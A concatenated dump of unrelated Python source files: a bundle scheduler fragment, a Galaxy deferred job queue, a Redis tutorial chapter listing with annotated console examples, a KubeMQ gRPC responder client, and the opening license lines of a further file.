return RunResources(
cpus=self._compute_request_cpus(bundle),
gpus=self._compute_request_gpus(bundle),
docker_image=self._get_docker_image(bundle),
time=self._compute_request_time(bundle),
memory=self._compute_request_memory(bundle),
disk=self._compute_request_disk(bundle),
network=bundle.metadata.request_network,
)
def _fail_unresponsive_bundles(self):
"""
Fail bundles in uploading, staged and running state if we haven't heard from them for more than
BUNDLE_TIMEOUT_DAYS days.
"""
bundles_to_fail = (
self._model.batch_get_bundles(state=State.UPLOADING)
+ self._model.batch_get_bundles(state=State.STAGED)
+ self._model.batch_get_bundles(state=State.RUNNING)
)
now = time.time()
for bundle in bundles_to_fail:
# For simplicity, we use field metadata.created to calculate timeout for now.
# Ideally, we should use field metadata.last_updated.
if now - bundle.metadata.created > BUNDLE_TIMEOUT_DAYS * SECONDS_PER_DAY:
failure_message = 'Bundle has been stuck in {} state for more than {} days.'.format(
bundle.state, BUNDLE_TIMEOUT_DAYS
)
logger.info('Failing bundle %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle,
{'state': State.FAILED, 'metadata': {'failure_message': failure_message}},
)
def _schedule_run_bundles(self):
"""
This method implements a state machine. The states are:
STAGED, no worker_run DB entry:
Ready to send run message to available worker.
STARTING, has worker_run DB entry:
Run message sent, waiting for the run to start.
RUNNING, has worker_run DB entry:
Worker reported that the run has started.
READY / FAILED, no worker_run DB entry:
Finished.
"""
workers = WorkerInfoAccessor(self._worker_model.get_workers())
# Handle some exceptional cases.
self._cleanup_dead_workers(workers)
self._restage_stuck_starting_bundles(workers)
self._bring_offline_stuck_running_bundles(workers)
self._fail_on_too_many_resources()
self._acknowledge_recently_finished_bundles(workers)
# Schedule, preferring user-owned workers.
self._schedule_run_bundles_on_workers(workers, user_owned=True)
self._schedule_run_bundles_on_workers(workers, user_owned=False)
@staticmethod
def _check_resource_failure(
value,
user_fail_string=None,
global_fail_string=None,
user_max=None,
global_max=None,
pretty_print=lambda x: str(x),
):
"""
Returns a failure message in case a certain resource limit is not respected.
If value > user_max, user_fail_string is formatted with value and user_max in that order
If value > global_max, global_fail_strintg is formatted with value and global_max in that order
Pretty print is applied to both the value and max values before they're passed on to the functions
The strings should expect string inputs for formatting and pretty_print should convert values to strings
"""
if value:
if user_max and value > user_max:
return user_fail_string % (pretty_print(value), pretty_print(user_max))
elif global_max and value > global_max:
return global_fail_string % (pretty_print(value), pretty_print(global_max))
return None
def _fail_on_too_many_resources(self):
"""
Fails bundles that request more resources than available for the given user.
Note: allow more resources than available on any worker because new
workers might get spun up in response to the presence of this run.
"""
for bundle in self._model.batch_get_bundles(state=State.STAGED, bundle_type='run'):
bundle_resources = self._compute_bundle_resources(bundle)
failures = []
failures.append(
self._check_resource_failure(
bundle_resources.disk,
user_fail_string='Requested more disk (%s) than user disk quota left (%s)',
user_max=self._model.get_user_disk_quota_left(bundle.owner_id),
global_fail_string='Maximum job disk size (%s) exceeded (%s)',
global_max=self._max_request_disk,
pretty_print=formatting.size_str,
)
)
failures.append(
self._check_resource_failure(
bundle_resources.time,
user_fail_string='Requested more time (%s) than user time quota left (%s)',
user_max=self._model.get_user_time_quota_left(bundle.owner_id),
global_fail_string='Maximum job time (%s) exceeded (%s)',
global_max=self._max_request_time,
pretty_print=formatting.duration_str,
)
)
failures.append(
self._check_resource_failure(
bundle_resources.memory,
global_fail_string='Requested more memory (%s) than maximum limit (%s)',
global_max=self._max_request_memory,
pretty_print=formatting.size_str,
)
)
failures = [f for f in failures if f is not None]
if len(failures) > 0:
failure_message = '. '.join(failures)
logger.info('Failing %s: %s', bundle.uuid, failure_message)
self._model.update_bundle(
bundle,
{'state': State.FAILED, 'metadata': {'failure_message': failure_message}},
)
|
__init__.py
|
"""
Queue for running deferred code via plugins.
"""
import logging
import os
import threading
from Queue import Queue
from galaxy import model
from galaxy.util.bunch import Bunch
from galaxy.util.sleeper import Sleeper
log = logging.getLogger(__name__)
class DeferredJobQueue(object):
job_states = Bunch(READY='ready',
WAIT='wait',
INVALID='invalid')
def __init__(self, app):
self.app = app
self.sa_session = app.model.context.current
self.queue = Queue()
self.plugins = {}
self._load_plugins()
self.sleeper = Sleeper()
self.running = True
self.waiting_jobs = []
self.__check_jobs_at_startup()
self.monitor_thread = threading.Thread(target=self.__monitor)
self.monitor_thread.start()
log.info('Deferred job queue started')
def _load_plugins(self):
for fname in os.listdir(os.path.dirname(__file__)):
if not fname.startswith('_') and fname.endswith('.py'):
name = fname[:-3]
module_name = 'galaxy.jobs.deferred.' + name
try:
module = __import__(module_name)
except ImportError:
log.exception('Deferred job plugin appears to exist but is not loadable: %s', module_name)
continue
for comp in module_name.split(".")[1:]:
module = getattr(module, comp)
if '__all__' not in dir(module):
log.error('Plugin "%s" does not contain a list of exported classes in __all__' % module_name)
continue
for obj in module.__all__:
display_name = ':'.join((module_name, obj))
plugin = getattr(module, obj)
for name in ('check_job', 'run_job'):
if name not in dir(plugin):
log.error('Plugin "%s" does not contain required method "%s()"' % (display_name, name))
break
else:
self.plugins[obj] = plugin(self.app)
self.plugins[obj].job_states = self.job_states
log.debug('Loaded deferred job plugin: %s' % display_name)
def __check_jobs_at_startup(self):
waiting_jobs = self.sa_session.query(model.DeferredJob) \
.filter(model.DeferredJob.state == model.DeferredJob.states.WAITING).all()
for job in waiting_jobs:
if not self.__check_job_plugin(job):
continue
if 'check_interval' in dir(self.plugins[job.plugin]):
job.check_interval = self.plugins[job.plugin].check_interval
log.info('Recovered deferred job (id: %s) at startup' % job.id)
# Pass the job ID as opposed to the job, since the monitor thread
# needs to load it in its own threadlocal scoped session.
self.waiting_jobs.append(job.id)
def __monitor(self):
while self.running:
try:
self.__monitor_step()
except Exception:
log.exception('Exception in monitor_step')
self.sleeper.sleep(1)
log.info('job queue stopped')
def __monitor_step(self):
# TODO: Querying the database with this frequency is bad, we need message passing
new_jobs = self.sa_session.query(model.DeferredJob) \
.filter(model.DeferredJob.state == model.DeferredJob.states.NEW).all()
for job in new_jobs:
if not self.__check_job_plugin(job):
continue
job.state = model.DeferredJob.states.WAITING
self.sa_session.add(job)
self.sa_session.flush()
if 'check_interval' in dir(self.plugins[job.plugin]):
job.check_interval = self.plugins[job.plugin].check_interval
self.waiting_jobs.append(job)
new_waiting = []
for job in self.waiting_jobs:
try:
# Recovered jobs are passed in by ID
assert type(job) is int
job = self.sa_session.query(model.DeferredJob).get(job)
except Exception:
pass
if job.is_check_time:
try:
job_state = self.plugins[job.plugin].check_job(job)
except Exception:
self.__fail_job(job)
log.exception('Set deferred job %s to error because of an exception in check_job()' % job.id)
continue
if job_state == self.job_states.READY:
try:
self.plugins[job.plugin].run_job(job)
except Exception:
self.__fail_job(job)
log.exception('Set deferred job %s to error because of an exception in run_job()' % job.id)
continue
elif job_state == self.job_states.INVALID:
self.__fail_job(job)
log.error('Unable to run deferred job (id: %s): Plugin "%s" marked it as invalid' % (job.id, job.plugin))
continue
else:
new_waiting.append(job)
job.last_check = 'now'
else:
new_waiting.append(job)
self.waiting_jobs = new_waiting
def __check_job_plugin(self, job):
if job.plugin not in self.plugins:
log.error('Invalid deferred job plugin: %s') % job.plugin
job.state = model.DeferredJob.states.ERROR
self.sa_session.add(job)
self.sa_session.flush()
return False
return True
def __check_if_ready_to_run(self, job):
return self.plugins[job.plugin].check_job(job)
def __fail_job(self, job):
job.state = model.DeferredJob.states.ERROR
self.sa_session.add(job)
self.sa_session.flush()
def shutdown(self):
self.running = False
self.sleeper.wake()
class FakeTrans(object):
"""A fake trans for calling the external set metadata tool"""
def __init__(self, app, history=None, user=None):
class Dummy(object):
def __init__(self):
self.id = None
self.app = app
self.sa_session = app.model.context.current
self.dummy = Dummy()
if not history:
self.history = Dummy()
else:
self.history = history
if not user:
self.user = Dummy()
else:
self.user = user
self.model = app.model
def get_galaxy_session(self):
return self.dummy
def log_event(self, message, tool_id=None):
pass
def get_current_user_roles(self):
if self.user:
return self.user.all_roles()
else:
return []
def db_dataset_for(self, dbkey):
if self.history is None:
return None
datasets = self.sa_session.query(self.app.model.HistoryDatasetAssociation) \
.filter_by(deleted=False, history_id=self.history.id, extension="len")
for ds in datasets:
if dbkey == ds.dbkey:
return ds
return None
|
ch03_listing_source.py
|
# -*- coding: utf-8 -*-
import threading
import time
import unittest
import redis
ONE_WEEK_IN_SECONDS = 7 * 86400
VOTE_SCORE = 432
ARTICLES_PER_PAGE = 25
'''
# <start id="string-calls-1"/>
>>> conn = redis.Redis()
>>> conn.get('key') #A
>>> conn.incr('key') #B
1 #B
>>> conn.incr('key', 15) #B
16 #B
>>> conn.decr('key', 5) #C
11 #C
>>> conn.get('key') #D
'11' #D
>>> conn.set('key', '13') #E
True #E
>>> conn.incr('key') #E
14 #E
# <end id="string-calls-1"/>
#A When we fetch a key that does not exist, we get the None value, which is not displayed in the interactive console
#B We can increment keys that don't exist, and we can pass an optional value to increment by more than 1
#C Like incrementing, decrementing takes an optional argument for the amount to decrement by
#D When we fetch the key it acts like a string
#E And when we set the key, we can set it as a string, but still manipulate it like an integer
#END
'''
'''
# <start id="string-calls-2"/>
>>> conn.append('new-string-key', 'hello ') #A
6L #B
>>> conn.append('new-string-key', 'world!')
12L #B
>>> conn.substr('new-string-key', 3, 7) #C
'lo wo' #D
>>> conn.setrange('new-string-key', 0, 'H') #E
12 #F
>>> conn.setrange('new-string-key', 6, 'W')
12
>>> conn.get('new-string-key') #G
'Hello World!' #H
>>> conn.setrange('new-string-key', 11, ', how are you?') #I
25
>>> conn.get('new-string-key')
'Hello World, how are you?' #J
>>> conn.setbit('another-key', 2, 1) #K
0 #L
>>> conn.setbit('another-key', 7, 1) #M
0 #M
>>> conn.get('another-key') #M
'!' #N
# <end id="string-calls-2"/>
#A Let's append the string 'hello ' to the previously non-existent key 'new-string-key'
#B When appending a value, Redis returns the length of the string so far
#C Redis uses 0-indexing, and when accessing ranges, is inclusive of the endpoints by default
#D The string 'lo wo' is from the middle of 'hello world!'
#E Let's set a couple string ranges
#F When setting a range inside a string, Redis also returns the total length of the string
#G Let's see what we have now!
#H Yep, we capitalized our 'H' and 'W'
#I With setrange we can replace anywhere inside the string, and we can make the string longer
#J We replaced the exclamation point and added more to the end of the string
#K If you write to a bit beyond the size of the string, it is filled with nulls
#L Setting bits also returns the value of the bit before it was set
#M If you are going to try to interpret the bits stored in Redis, remember that offsets into bits are from the highest-order to the lowest-order
#N We set bits 2 and 7 to 1, which gave us '!', or character 33
#END
'''
'''
# <start id="list-calls-1"/>
>>> conn.rpush('list-key', 'last') #A
1L #A
>>> conn.lpush('list-key', 'first') #B
2L
>>> conn.rpush('list-key', 'new last')
3L
>>> conn.lrange('list-key', 0, -1) #C
['first', 'last', 'new last'] #C
>>> conn.lpop('list-key') #D
'first' #D
>>> conn.lpop('list-key') #D
'last' #D
>>> conn.lrange('list-key', 0, -1)
['new last']
>>> conn.rpush('list-key', 'a', 'b', 'c') #E
4L
>>> conn.lrange('list-key', 0, -1)
['new last', 'a', 'b', 'c']
>>> conn.ltrim('list-key', 2, -1) #F
True #F
>>> conn.lrange('list-key', 0, -1) #F
['b', 'c'] #F
# <end id="list-calls-1"/>
#A When we push items onto the list, it returns the length of the list after the push has completed
#B We can easily push on both ends of the list
#C Semantically, the left end of the list is the beginning, and the right end of the list is the end
#D Popping off the left items repeatedly will return items from left to right
#E We can push multiple items at the same time
#F We can trim any number of items from the start, end, or both
#END
'''
'''
# <start id="list-calls-2"/>
>>> conn.rpush('list', 'item1') #A
1 #A
>>> conn.rpush('list', 'item2') #A
2 #A
>>> conn.rpush('list2', 'item3') #A
1 #A
>>> conn.brpoplpush('list2', 'list', 1) #B
'item3' #B
>>> conn.brpoplpush('list2', 'list', 1) #C
>>> conn.lrange('list', 0, -1) #D
['item3', 'item1', 'item2'] #D
>>> conn.brpoplpush('list', 'list2', 1)
'item2'
>>> conn.blpop(['list', 'list2'], 1) #E
('list', 'item3') #E
>>> conn.blpop(['list', 'list2'], 1) #E
('list', 'item1') #E
>>> conn.blpop(['list', 'list2'], 1) #E
('list2', 'item2') #E
>>> conn.blpop(['list', 'list2'], 1) #E
>>>
# <end id="list-calls-2"/>
#A Let's add some items to a couple lists to start
#B Let's move an item from one list to the other, leaving it
#C When a list is empty, the blocking pop will stall for the timeout, and return None (which is not displayed in the interactive console)
#D We popped the rightmost item from 'list2' and pushed it to the left of 'list'
#E Blocking left-popping items from these will check lists for items in the order that they are passed, until they are empty
#END
'''
# <start id="exercise-update-token"/>
def update_token(conn, token, user, item=None):
timestamp = time.time()
conn.hset('login:', token, user)
conn.zadd('recent:', token, timestamp)
if item:
key = 'viewed:' + token
conn.lrem(key, item) #A
conn.rpush(key, item) #B
conn.ltrim(key, -25, -1) #C
conn.zincrby('viewed:', item, -1)
# <end id="exercise-update-token"/>
#A Remove the item from the list if it was there
#B Push the item to the right side of the LIST so that ZRANGE and LRANGE have the same result
#C Trim the LIST to only include the most recent 25 items
#END
'''
# <start id="set-calls-1"/>
>>> conn.sadd('set-key', 'a', 'b', 'c') #A
3 #A
>>> conn.srem('set-key', 'c', 'd') #B
True #B
>>> conn.srem('set-key', 'c', 'd') #B
False #B
>>> conn.scard('set-key') #C
2 #C
>>> conn.smembers('set-key') #D
set(['a', 'b']) #D
>>> conn.smove('set-key', 'set-key2', 'a') #E
True #E
>>> conn.smove('set-key', 'set-key2', 'c') #F
False #F
>>> conn.smembers('set-key2') #F
set(['a']) #F
# <end id="set-calls-1"/>
#A Adding items to the SET returns the number of items that weren't already in the SET
#B Removing items from the SET returns whether an item was removed - note that the client is buggy in that respect, as Redis itself returns the total number of items removed
#C We can get the number of items in the SET
#D We can also fetch the whole SET
#E We can easily move items from one SET to another SET
#F When an item doesn't exist in the first set during a SMOVE, it isn't added to the destination SET
#END
'''
'''
# <start id="set-calls-2"/>
>>> conn.sadd('skey1', 'a', 'b', 'c', 'd') #A
4 #A
>>> conn.sadd('skey2', 'c', 'd', 'e', 'f') #A
4 #A
>>> conn.sdiff('skey1', 'skey2') #B
set(['a', 'b']) #B
>>> conn.sinter('skey1', 'skey2') #C
set(['c', 'd']) #C
>>> conn.sunion('skey1', 'skey2') #D
set(['a', 'c', 'b', 'e', 'd', 'f']) #D
# <end id="set-calls-2"/>
#A First we'll add a few items to a couple SETs
#B We can calculate the result of removing all of the items in the second set from the first SET
#C We can also find out which items exist in both SETs
#D And we can find out all of the items that are in either of the SETs
#END
'''
'''
# <start id="hash-calls-1"/>
>>> conn.hmset('hash-key', {'k1':'v1', 'k2':'v2', 'k3':'v3'}) #A
True #A
>>> conn.hmget('hash-key', ['k2', 'k3']) #B
['v2', 'v3'] #B
>>> conn.hlen('hash-key') #C
3 #C
>>> conn.hdel('hash-key', 'k1', 'k3') #D
True #D
# <end id="hash-calls-1"/>
#A We can add multiple items to the hash in one call
#B We can fetch a subset of the values in a single call
#C The HLEN command is typically used for debugging very large HASHes
#D The HDEL command handles multiple arguments without needing an HMDEL counterpart and returns True if any fields were removed
#END
'''
'''
# <start id="hash-calls-2"/>
>>> conn.hmset('hash-key2', {'short':'hello', 'long':1000*'1'}) #A
True #A
>>> conn.hkeys('hash-key2') #A
['long', 'short'] #A
>>> conn.hexists('hash-key2', 'num') #B
False #B
>>> conn.hincrby('hash-key2', 'num') #C
1L #C
>>> conn.hexists('hash-key2', 'num') #C
True #C
# <end id="hash-calls-2"/>
#A Fetching keys can be useful to keep from needing to transfer large values when you are looking into HASHes
#B We can also check the existence of specific keys
#C Incrementing a previously non-existent key in a hash behaves just like on strings, Redis operates as though the value had been 0
#END
'''
'''
# <start id="zset-calls-1"/>
>>> conn.zadd('zset-key', 'a', 3, 'b', 2, 'c', 1) #A
3 #A
>>> conn.zcard('zset-key') #B
3 #B
>>> conn.zincrby('zset-key', 'c', 3) #C
4.0 #C
>>> conn.zscore('zset-key', 'b') #D
2.0 #D
>>> conn.zrank('zset-key', 'c') #E
2 #E
>>> conn.zcount('zset-key', 0, 3) #F
2L #F
>>> conn.zrem('zset-key', 'b') #G
True #G
>>> conn.zrange('zset-key', 0, -1, withscores=True) #H
[('a', 3.0), ('c', 4.0)] #H
# <end id="zset-calls-1"/>
#A Adding members to ZSETs in Python has the arguments reversed compared to standard Redis, so as to not confuse users compared to HASHes
#B Knowing how large a ZSET is can tell you in some cases if it is necessary to trim your ZSET
#C We can also increment members like we can with STRING and HASH values
#D Fetching scores of individual members can be useful if you have been keeping counters or toplists
#E By fetching the 0-indexed position of a member, we can then later use ZRANGE to fetch a range of the values easily
#F Counting the number of items with a given range of scores can be quite useful for some tasks
#G Removing members is as easy as adding them
#H For debugging, we usually fetch the entire ZSET with this ZRANGE call, but real use-cases will usually fetch items a relatively small group at a time
#END
'''
'''
# <start id="zset-calls-2"/>
>>> conn.zadd('zset-1', 'a', 1, 'b', 2, 'c', 3) #A
3 #A
>>> conn.zadd('zset-2', 'b', 4, 'c', 1, 'd', 0) #A
3 #A
>>> conn.zinterstore('zset-i', ['zset-1', 'zset-2']) #B
2L #B
>>> conn.zrange('zset-i', 0, -1, withscores=True) #B
[('c', 4.0), ('b', 6.0)] #B
>>> conn.zunionstore('zset-u', ['zset-1', 'zset-2'], aggregate='min') #C
4L #C
>>> conn.zrange('zset-u', 0, -1, withscores=True) #C
[('d', 0.0), ('a', 1.0), ('c', 1.0), ('b', 2.0)] #C
>>> conn.sadd('set-1', 'a', 'd') #D
2 #D
>>> conn.zunionstore('zset-u2', ['zset-1', 'zset-2', 'set-1']) #D
4L #D
>>> conn.zrange('zset-u2', 0, -1, withscores=True) #D
[('d', 1.0), ('a', 2.0), ('c', 4.0), ('b', 6.0)] #D
# <end id="zset-calls-2"/>
#A We'll start out by creating a couple ZSETs
#B When performing ZINTERSTORE or ZUNIONSTORE, our default aggregate is sum, so scores of items that are in multiple ZSETs are added
#C It is easy to provide different aggregates, though we are limited to sum, min, and max
#D You can also pass SETs as inputs to ZINTERSTORE and ZUNIONSTORE, they behave as though they were ZSETs with all scores equal to 1
#END
'''
conn = redis.Redis()
def publisher(n):
time.sleep(1)
for i in xrange(n):
conn.publish('channel', i)
time.sleep(1)
def run_pubsub():
threading.Thread(target=publisher, args=(3,)).start()
pubsub = conn.pubsub()
pubsub.subscribe(['channel'])
count = 0
for item in pubsub.listen():
print item
count += 1
if count == 4:
pubsub.unsubscribe()
if count == 5:
break
'''
# <start id="pubsub-calls-1"/>
>>> def publisher(n):
... time.sleep(1) #A
... for i in xrange(n):
... conn.publish('channel', i) #B
... time.sleep(1) #B
...
>>> def run_pubsub():
... threading.Thread(target=publisher, args=(3,)).start()
... pubsub = conn.pubsub()
... pubsub.subscribe(['channel'])
... count = 0
... for item in pubsub.listen():
... print item
... count += 1
... if count == 4:
... pubsub.unsubscribe()
... if count == 5:
... break
...
>>> def run_pubsub():
... threading.Thread(target=publisher, args=(3,)).start() #D
... pubsub = conn.pubsub() #E
... pubsub.subscribe(['channel']) #E
... count = 0
... for item in pubsub.listen(): #F
... print item #G
... count += 1 #H
... if count == 4: #H
... pubsub.unsubscribe() #H
... if count == 5: #L
... break #L
...
>>> run_pubsub() #C
{'pattern': None, 'type': 'subscribe', 'channel': 'channel', 'data': 1L}#I
{'pattern': None, 'type': 'message', 'channel': 'channel', 'data': '0'} #J
{'pattern': None, 'type': 'message', 'channel': 'channel', 'data': '1'} #J
{'pattern': None, 'type': 'message', 'channel': 'channel', 'data': '2'} #J
{'pattern': None, 'type': 'unsubscribe', 'channel': 'channel', 'data': #K
0L} #K
# <end id="pubsub-calls-1"/>
#A We sleep initially in the function to let the SUBSCRIBEr connect and start listening for messages
#B After publishing, we will pause for a moment so that we can see this happen over time
#D Let's start the publisher thread to send 3 messages
#E We'll set up the pubsub object and subscribe to a channel
#F We can listen to subscription messages by iterating over the result of pubsub.listen()
#G We'll print every message that we receive
#H We will stop listening for new messages after the subscribe message and 3 real messages by unsubscribing
#L When we receive the unsubscribe message, we need to stop receiving messages
#C Actually run the functions to see them work
#I When subscribing, we receive a message on the listen channel
#J These are the structures that are produced as items when we iterate over pubsub.listen()
#K When we unsubscribe, we receive a message telling us which channels we have unsubscribed from and the number of channels we are still subscribed to
#END
'''
'''
# <start id="sort-calls"/>
>>> conn.rpush('sort-input', 23, 15, 110, 7) #A
4 #A
>>> conn.sort('sort-input') #B
['7', '15', '23', '110'] #B
>>> conn.sort('sort-input', alpha=True) #C
['110', '15', '23', '7'] #C
>>> conn.hset('d-7', 'field', 5) #D
1L #D
>>> conn.hset('d-15', 'field', 1) #D
1L #D
>>> conn.hset('d-23', 'field', 9) #D
1L #D
>>> conn.hset('d-110', 'field', 3) #D
1L #D
>>> conn.sort('sort-input', by='d-*->field') #E
['15', '110', '7', '23'] #E
>>> conn.sort('sort-input', by='d-*->field', get='d-*->field') #F
['1', '3', '5', '9'] #F
# <end id="sort-calls"/>
#A Start by adding some items to a LIST
#B We can sort the items numerically
#C And we can sort the items alphabetically
#D We are just adding some additional data for SORTing and fetching
#E We can sort our data by fields of HASHes
#F And we can even fetch that data and return it instead of or in addition to our input data
#END
'''
'''
# <start id="simple-pipeline-notrans"/>
>>> def notrans():
... print conn.incr('notrans:') #A
... time.sleep(.1) #B
... conn.incr('notrans:', -1) #C
...
>>> if 1:
... for i in xrange(3): #D
... threading.Thread(target=notrans).start() #D
... time.sleep(.5) #E
...
1 #F
2 #F
3 #F
# <end id="simple-pipeline-notrans"/>
#A Increment the 'notrans:' counter and print the result
#B Wait for 100 milliseconds
#C Decrement the 'notrans:' counter
#D Start three threads to execute the non-transactional increment/sleep/decrement
#E Wait half a second for everything to be done
#F Because there is no transaction, each of the threaded commands can interleave freely, causing the counter to steadily grow in this case
#END
'''
'''
# <start id="simple-pipeline-trans"/>
>>> def trans():
... pipeline = conn.pipeline() #A
... pipeline.incr('trans:') #B
... time.sleep(.1) #C
... pipeline.incr('trans:', -1) #D
... print pipeline.execute()[0] #E
...
>>> if 1:
... for i in xrange(3): #F
... threading.Thread(target=trans).start() #F
... time.sleep(.5) #G
...
1 #H
1 #H
1 #H
# <end id="simple-pipeline-trans"/>
#A Create a transactional pipeline
#B Queue up the 'trans:' counter increment
#C Wait for 100 milliseconds
#D Queue up the 'trans:' counter decrement
#E Execute both commands and print the result of the increment operation
#F Start three of the transactional increment/sleep/decrement calls
#G Wait half a second for everything to be done
#H Because each increment/sleep/decrement pair is executed inside a transaction, no other commands can be interleaved, which gets us a result of 1 for all of our results
#END
'''
# <start id="exercise-fix-article-vote"/>
def article_vote(conn, user, article):
cutoff = time.time() - ONE_WEEK_IN_SECONDS
posted = conn.zscore('time:', article) #A
if posted < cutoff:
return
article_id = article.partition(':')[-1]
pipeline = conn.pipeline()
pipeline.sadd('voted:' + article_id, user)
pipeline.expire('voted:' + article_id, int(posted-cutoff)) #B
if pipeline.execute()[0]:
pipeline.zincrby('score:', article, VOTE_SCORE) #C
pipeline.hincrby(article, 'votes', 1) #C
pipeline.execute() #C
# <end id="exercise-fix-article-vote"/>
#A If the article should expire bewteen our ZSCORE and our SADD, we need to use the posted time to properly expire it
#B Set the expiration time if we shouldn't have actually added the vote to the SET
#C We could lose our connection between the SADD/EXPIRE and ZINCRBY/HINCRBY, so the vote may not count, but that is better than it partially counting by failing between the ZINCRBY/HINCRBY calls
#END
# Technically, the above article_vote() version still has some issues, which
# are addressed in the following, which uses features/functionality not
# introduced until chapter 4.
def article_vote(conn, user, article):
cutoff = time.time() - ONE_WEEK_IN_SECONDS
posted = conn.zscore('time:', article)
article_id = article.partition(':')[-1]
voted = 'voted:' + article_id
pipeline = conn.pipeline()
while posted > cutoff:
try:
pipeline.watch(voted)
if not pipeline.sismember(voted, user):
pipeline.multi()
pipeline.sadd(voted, user)
pipeline.expire(voted, int(posted-cutoff))
pipeline.zincrby('score:', article, VOTE_SCORE)
pipeline.hincrby(article, 'votes', 1)
pipeline.execute()
else:
pipeline.unwatch()
return
except redis.exceptions.WatchError:
cutoff = time.time() - ONE_WEEK_IN_SECONDS
# <start id="exercise-fix-get_articles"/>
def get_articles(conn, page, order='score:'):
start = max(page-1, 0) * ARTICLES_PER_PAGE
end = start + ARTICLES_PER_PAGE - 1
ids = conn.zrevrangebyscore(order, start, end)
pipeline = conn.pipeline()
map(pipeline.hgetall, ids) #A
articles = []
for id, article_data in zip(ids, pipeline.execute()): #B
article_data['id'] = id
articles.append(article_data)
return articles
# <end id="exercise-fix-get_articles"/>
#A Prepare the HGETALL calls on the pipeline
#B Execute the pipeline and add ids to the article
#END
'''
# <start id="other-calls-1"/>
>>> conn.set('key', 'value') #A
True #A
>>> conn.get('key') #A
'value' #A
>>> conn.expire('key', 2) #B
True #B
>>> time.sleep(2) #B
>>> conn.get('key') #B
>>> conn.set('key', 'value2')
True
>>> conn.expire('key', 100); conn.ttl('key') #C
True #C
100 #C
# <end id="other-calls-1"/>
#A We are starting with a very simple STRING value
#B If we set a key to expire in the future, and we wait long enough for the key to expire, when we try to fetch the key, it has already been deleted
#C We can also easily find out how long it will be before a key will expire
#END
'''
# <start id="exercise-no-recent-zset"/>
THIRTY_DAYS = 30*86400
def check_token(conn, token):
return conn.get('login:' + token) #A
def update_token(conn, token, user, item=None):
conn.setex('login:' + token, user, THIRTY_DAYS) #B
key = 'viewed:' + token
if item:
conn.lrem(key, item)
conn.rpush(key, item)
conn.ltrim(key, -25, -1)
conn.zincrby('viewed:', item, -1)
conn.expire(key, THIRTY_DAYS) #C
def add_to_cart(conn, session, item, count):
key = 'cart:' + session
if count <= 0:
conn.hrem(key, item)
else:
conn.hset(key, item, count)
conn.expire(key, THIRTY_DAYS) #D
# <end id="exercise-no-recent-zset"/>
#A We are going to store the login token as a string value so we can EXPIRE it
#B Set the value of the the login token and the token's expiration time with one call
#C We can't manipulate LISTs and set their expiration at the same time, so we must do it later
#D We also can't manipulate HASHes and set their expiration times, so we again do it later
#END
|
responder.py
|
# MIT License
#
# Copyright (c) 2018 KubeMQ
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import threading
import grpc
from kubemq.grpc import Empty
from kubemq.basic.grpc_client import GrpcClient
from kubemq.commandquery.request_receive import RequestReceive
from kubemq.tools.listener_cancellation_token import ListenerCancellationToken
class Responder(GrpcClient):
"""An instance that responsible on receiving request from the kubeMQ."""
def __init__(self, kubemq_address=None):
"""
Initialize a new Responder to subscribe to Response.
:param str kubemq_address: KubeMQ server address. if None will be parsed from Config or environment parameter.
"""
GrpcClient.__init__(self)
if kubemq_address:
self._kubemq_address = kubemq_address
def ping(self):
"""ping check connection to the kubemq"""
ping_result = self.get_kubemq_client().Ping(Empty())
logging.debug("Responder KubeMQ address:%s ping result:%s'" % (self._kubemq_address, ping_result))
return ping_result
def subscribe_to_requests(self, subscribe_request, handler,error_handler,listener_cancellation_token=ListenerCancellationToken()):
"""
Register to kubeMQ Channel using handler.
:param SubscribeRequest subscribe_request: represent by that will determine the subscription configuration.
:param handler: Method the perform when receiving RequestReceive
:param error_handler: Method the perform when receiving error from kubemq
:param listener_cancellation_token: cancellation token, once cancel is called will cancel the subscribe to kubemq
:return: A thread running the Subscribe Request.
"""
if not subscribe_request.channel:
raise ValueError("Channel parameter is mandatory.")
if not subscribe_request.is_valid_type("CommandQuery"):
raise ValueError("Invalid Subscribe Type for this Class.")
inner_subscribe_request = subscribe_request.to_inner_subscribe_request()
call = self.get_kubemq_client().SubscribeToRequests(inner_subscribe_request, metadata=self._metadata)
def subscribe_task(listener_cancellation_token):
while True:
try:
event_receive = call.next()
logging.debug("Responder InnerRequest. ID:'%s', Channel:'%s', ReplyChannel:'%s tags:'%s''" % (
event_receive.RequestID,
event_receive.Channel,
event_receive.ReplyChannel,
event_receive.Tags
))
if handler:
try:
response = handler(RequestReceive(event_receive))
logging.debug("Responder InnerResponse. ID:'%s', ReplyChannel:'%s'" % (
response.request_id,
response.reply_channel
))
self.get_kubemq_client().SendResponse(response.convert(), self._metadata)
except grpc.RpcError as error:
if (listener_cancellation_token.is_cancelled):
logging.info("Sub closed by listener request")
else:
logging.info("Subscriber Received Error: Error:'%s'" % (
str(error)
))
error_handler(error)
except Exception as e:
logging.info("Subscriber Received Error: Error:'%s'" % (
str(e)
))
error_handler(str(e))
except Exception as e:
logging.exception("An exception occurred while listening for request:'%s'" % (e))
raise # re-raise the original exception, keeping full stack trace
def check_sub_to_valid(listener_cancellation_token):
while True:
if (listener_cancellation_token.is_cancelled):
logging.info("Sub closed by listener request")
call.cancel()
return
thread = threading.Thread(target=subscribe_task, args=(listener_cancellation_token,))
thread.daemon = True
thread.start()
listener_thread = threading.Thread(target=check_sub_to_valid, args=(listener_cancellation_token,))
listener_thread.daemon = True
listener_thread.start()
return thread
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
